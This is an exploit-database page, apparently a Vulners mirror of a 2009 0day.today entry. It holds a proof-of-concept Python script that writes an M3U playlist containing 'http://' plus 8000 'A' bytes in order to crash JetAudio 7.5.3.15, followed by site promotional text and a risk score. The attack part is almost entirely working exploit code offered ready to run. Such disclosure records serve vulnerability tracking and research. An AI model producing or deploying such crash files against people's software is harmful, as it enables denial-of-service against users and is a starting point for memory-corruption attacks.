Lucene search
K

JetAudio 7.5.3.15 (.M3U File) Local Crash PoC

🗓️ 06 Aug 2009 00:00:00Reported by Dr_IDEType 
zdt
 zdt
🔗 0day.today👁 22 Views

JetAudio 7.5.3.15 Local Crash PoC - M3U Fil

Code
=============================================
JetAudio 7.5.3.15 (.M3U File) Local Crash PoC
=============================================


#!/usr/bin/env python

###########################################################################################
#
# JetAudio 7.5.3.15 Local Crash PoC
# Found By: Dr_IDE
# Download: http://www.cowonamerica.com/download/
# Tested on Windows XP SP2
# 
############################################################################################

# Crash occurs in msvcr90.dll which is included with this version of the program.


buff = ("http://" + "\x41" * 8000);

print " [-] Creating payload.";

f1 = open('JA_7.5.3.15.M3U','w');
f1.write(buff);
f1.close();

print " [-] File created successfully.";




#  0day.today [2017-12-31]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Aug 2009 00:00Current
7High risk
Vulners AI Score7
22